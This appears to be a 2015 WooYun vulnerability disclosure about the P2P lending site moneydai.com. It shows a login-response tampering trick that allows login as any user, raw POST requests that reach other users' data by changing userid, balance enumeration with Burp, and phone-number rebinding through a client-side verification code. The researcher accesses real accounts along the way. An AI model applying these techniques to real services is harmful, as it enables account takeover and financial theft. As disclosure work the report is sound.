当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132061

漏洞标题:p2p之钱袋网任意用户登录+多处平行越权(影响全站用户)

相关厂商:深圳感融互联网金融服务有限公司

漏洞作者: 路人甲

提交时间:2015-08-06 12:06

修复时间:2015-09-20 17:26

公开时间:2015-09-20 17:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

任意用户登陆+越权/

详细说明:

首先是任意用户登录!
正常登录

S50806-105902.jpg


随便填入用户名,密码。抓包!

1.jpg


拦截response,将其改为

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Aug 2015 01:25:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 109
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
{"start":"1","userid":"11862","username":"15145425563","user":"15145425623","ms":"\u767b\u5f55\u6210\u529f!"}


通过更改userid实现任意用户登陆!

S50806-104315.jpg

S50805-170412.jpg

S50805-171126.jpg


上面是别人的账户!这么早合适才能碰到土豪!
找到个接口,可直接找出可用余额!

POST /App/User/getUserAll?userid=11122 HTTP/1.1
Cookie: PHPSESSID=8883l287fb42agledp0qde4cs1
appverify: md5=e599a8f42de7027202c62323269ff361;ts=1438829010865
Charset: UTF-8
Content-Type: application/json
User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;MX4 Build/FRF91 )
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0
Host: www.moneydai.com


burp跑下土豪!

3.jpg


mask 区域 
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****	9.92	9.*****
*****5.39	1000.*****
*****	8.94	8.*****
*****	8.88	8.*****
*****	8.84	8.*****
*****	7.56	0.*****
*****43.45	168.*****
*****	6.45	6.*****
*****872.40	0.0*****
*****242.34	19*****
*****45.01	20.0*****
*****14.70	207*****
*****00.00	5000*****
*****	5.88	5.*****
*****8660.00	0*****
*****92.34	157.*****
*****	4.96	4.*****
*****	4.96	4.*****
*****	4.96	4.*****
*****	4.96	4.*****
*****	37.63	3*****
*****14.88	14.8*****
*****	35.42	3*****
*****	34.88	3*****
*****3780.00	0*****
*****14.88	214*****
*****11.96	0.9*****
*****	208.91	*****
*****	2.38	2.*****
*****	2.37	2.*****
*****	2.00	2.*****
*****	15.88	1*****
*****	14.97	1*****
*****	14.97	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****
*****	14.88	1*****


选择一个土豪登陆下

4.jpg


就这个5w的土豪

S50806-111850.jpg

S50806-111654.jpg

S50806-111705.jpg


=====================================

在测试的时候还发现,登陆上去之后,可“绕过”验证码绑定另一个手机号!


=====================================

S50806-111640.jpg


这个还是那个土豪的,手机号被我绑定了另外一个!
具体实现方法就是填入你要绑定的手机号。发送验证码(给原来手机),会在本地返回验证码,并且自动填写到输入框,从而直接绑定成功!(这是社么设计?)
基本上app所有接口都可以通过userid越权

这是另外一处接口,其他自测,反正没有很多都可以越权
======================
POST /App/User/myhome?userid=11862 HTTP/1.1
Cookie: PHPSESSID=upfcei7sf7i7oc1l0fv5krvgs3
appverify: md5=c183eafe4a4acc98c7c0749110ea27b2;ts=1438831653244
Charset: UTF-8
Content-Type: application/json
User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;MX4 Build/FRF91 )
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Content-Length: 0
Host: www.moneydai.com
============================

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-06 17:24

厂商回复:

多谢提供漏洞,正在修复中!~

最新状态:

暂无